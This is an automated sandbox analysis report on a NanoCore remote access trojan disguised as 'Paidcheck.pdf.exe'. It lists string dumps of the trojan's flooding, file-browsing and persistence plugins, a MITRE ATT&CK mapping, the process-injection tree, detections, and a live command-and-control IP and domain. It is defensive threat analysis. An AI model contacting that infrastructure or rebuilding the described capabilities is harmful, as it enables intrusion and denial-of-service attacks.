      Source: Yara match | File source: 10.2.RegAsm.exe.3c24c35.9.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 0.2.Paidcheck.pdf.exe.3eceb18.5.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.RegAsm.exe.3d596b5.14.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.RegAsm.exe.3d4d481.12.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 0.2.Paidcheck.pdf.exe.3e36bd0.4.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.RegAsm.exe.3d6dce2.13.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 0.2.Paidcheck.pdf.exe.3ce1990.6.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 0000000A.00000002.486028172.0000000003C21000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000A.00000002.480862241.0000000002BD1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000A.00000002.486159057.0000000003C9E000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: Process Memory Space: Paidcheck.pdf.exe PID: 4608, type: MEMORY

      Remote Access Functionality:

      Detected Nanocore Rat
      Source: Paidcheck.pdf.exe, 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
      Source: RegAsm.exe | String found in binary or memory: NanoCore.ClientPluginHost
      Source: RegAsm.exe, 0000000A.00000002.480862241.0000000002BD1000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runt
ime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: RegAsm.exe, 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPC
ommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
      Source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSys
tem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
      Source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCrea
teDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
      Source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAt
tributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights

      Mitre Att&ck Matrix

      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Valid Accounts | Windows Management Instrumentation 1 | DLL Side-Loading 1 | DLL Side-Loading 1 | Disable or Modify Tools 1 | Input Capture 21 | System Time Discovery 1 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
      Default Accounts | Scripting 111 | Scheduled Task/Job 1 | Process Injection 212 | Deobfuscate/Decode Files or Information 1 | LSASS Memory | File and Directory Discovery 1 | Remote Desktop Protocol | Input Capture 21 | Exfiltration Over Bluetooth | Non-Standard Port 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts | Scheduled Task/Job 1 | Registry Run Keys / Startup Folder 11 | Scheduled Task/Job 1 | Scripting 111 | Security Account Manager | System Information Discovery 13 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Remote Access Software 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts | PowerShell 1 | Logon Script (Mac) | Registry Run Keys / Startup Folder 11 | Obfuscated Files or Information 12 | NTDS | Query Registry 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 1 | SIM Card Swap | - | Carrier Billing Fraud
      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 12 | LSA Secrets | Security Software Discovery 211 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings
      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Timestomp 1 | Cached Domain Credentials | Process Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | - | Abuse Accessibility Features
      External Remote Services | Scheduled Task | Startup Items | Startup Items | DLL Side-Loading 1 | DCSync | Virtualization/Sandbox Evasion 21 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | - | Data Encrypted for Impact
      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Masquerading 12 | Proc Filesystem | Application Window Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | - | Generate Fraudulent Advertising Revenue
      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Virtualization/Sandbox Evasion 21 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | - | Data Destruction
      Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Process Injection 212 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | - | - | Data Encrypted for Impact

      Behavior Graph

      Behavior Graph ID: 452385 | Sample: Paidcheck.pdf.exe | Startdate: 22/07/2021 | Architecture: WINDOWS | Score: 100

      Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 16 other signatures

      Process tree recovered from the graph:

      • Paidcheck.pdf.exe (started)
        dropped: C:\Users\user\AppData\...\explorerr.exe (PE32); C:\Users\user\AppData\Local\Temp\RegAsm.exe (PE32); C:\Users\...\explorerr.exe:Zone.Identifier (ASCII); 2 other malicious files
        signatures: Creates an undocumented autostart registry key; Writes to foreign memory regions; Injects a PE file into a foreign processes
        • RegAsm.exe (started)
          network: 217.138.212.57, port 2018, local port 49704, M247GB, United Kingdom
          dropped: C:\Users\user\AppData\Roaming\...\run.dat (Non-ISO); C:\Users\user\AppData\Local\...\tmp4FE3.tmp (XML); C:\Program Files (x86)\...\dhcpmon.exe (PE32)
          signatures: Uses schtasks.exe or at.exe to add and modify task schedules
          • schtasks.exe (started) -> conhost.exe (started)
          • schtasks.exe (started) -> conhost.exe (started)
        • wscript.exe (started)
          signatures: Wscript starts Powershell (via cmd or directly)
          • powershell.exe (started) -> conhost.exe (started)
      • RegAsm.exe (started) -> conhost.exe (started)
        dropped: C:\Users\user\AppData\...\RegAsm.exe.log (ASCII)
      • dhcpmon.exe (started) -> conhost.exe (started)
      • dhcpmon.exe (started) -> conhost.exe (started)


      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      Source | Detection | Scanner | Label
      Paidcheck.pdf.exe | 100% | Avira | HEUR/AGEN.1118541
      Paidcheck.pdf.exe | 100% | Joe Sandbox ML |

      Dropped Files

      Source | Detection | Scanner | Label
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe | 100% | Avira | HEUR/AGEN.1118541
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe | 100% | Joe Sandbox ML |
      C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 0% | Virustotal |
      C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 0% | Metadefender |
      C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 0% | ReversingLabs |
      C:\Users\user\AppData\Local\Temp\RegAsm.exe | 0% | Virustotal |
      C:\Users\user\AppData\Local\Temp\RegAsm.exe | 0% | Metadefender |
      C:\Users\user\AppData\Local\Temp\RegAsm.exe | 0% | ReversingLabs |
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe | 33% | ReversingLabs | ByteCode-MSIL.Backdoor.NanoBot

      Unpacked PE Files

      Source | Detection | Scanner | Label
      10.2.RegAsm.exe.5f60000.23.unpack | 100% | Avira | TR/NanoCore.fadte
      10.2.RegAsm.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7

      Domains

      No Antivirus matches

      URLs

      Source | Detection | Scanner | Label
      http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
      https://go.micro | 0% | URL Reputation | safe
      http://www.tiro.com | 0% | URL Reputation | safe
      http://www.goodfont.co.kr | 0% | URL Reputation | safe
      217.138.212.57 | 1% | Virustotal |
      217.138.212.57 | 0% | Avira URL Cloud | safe
      http://www.carterandcone.coml | 0% | URL Reputation | safe
      http://www.sajatypeworks.com | 0% | URL Reputation | safe
      http://www.typography.netD | 0% | URL Reputation | safe
      http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
      http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
      http://fontfabrik.com | 0% | URL Reputation | safe
      http://www.founder.com.cn/cn | 0% | URL Reputation | safe
      http://crl.microso | 0% | URL Reputation | safe
      http://crl.microsofX | 0% | Avira URL Cloud | safe
      http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
      http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
      http://www.sandoll.co.kr | 0% | URL Reputation | safe
      http://www.urwpp.deDPlease | 0% | URL Reputation | safe
      http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
      http://crl.micr | 0% | URL Reputation | safe
      http://www.sakkal.com | 0% | URL Reputation | safe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      Name | Malicious | Antivirus Detection | Reputation
      annapro.linkpc.net | false | | high
      217.138.212.57 | true | 1%, Virustotal; Avira URL Cloud: safe | unknown

        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp | false | - | high
http://www.fontbureau.com | Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp | false | - | high
http://www.fontbureau.com/designersG | Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp | false | - | high
http://www.fontbureau.com/designers/? | Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/bThe | Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp | false | - | high
https://go.micro | powershell.exe, 0000000B.00000003.373704213.00000000055FF000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.tiro.com | Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp | false | - | high
http://www.goodfont.co.kr | Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://google.com | RegAsm.exe, 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp | false | - | high
http://www.carterandcone.coml | Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/cThe | Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp | false | - | high
http://crl.microso | RegAsm.exe, 0000000A.00000002.479021599.0000000000EC2000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
http://crl.microsofX | RegAsm.exe, 0000000A.00000002.479021599.0000000000EC2000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/ | Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp | false | - | high
http://www.fonts.com | Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp | false | - | high
http://www.sandoll.co.kr | Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.micr | powershell.exe, 0000000B.00000003.376733884.0000000009675000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Paidcheck.pdf.exe, 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmp | false | - | high
http://www.sakkal.com | Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

                                Contacted IPs


                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
217.138.212.57 | unknown | United Kingdom | 9009 | M247GB | true

                                General Information

                                Joe Sandbox Version:33.0.0 White Diamond
                                Analysis ID:452385
                                Start date:22.07.2021
                                Start time:09:32:06
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 12m 44s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:Paidcheck.pdf.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:26
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
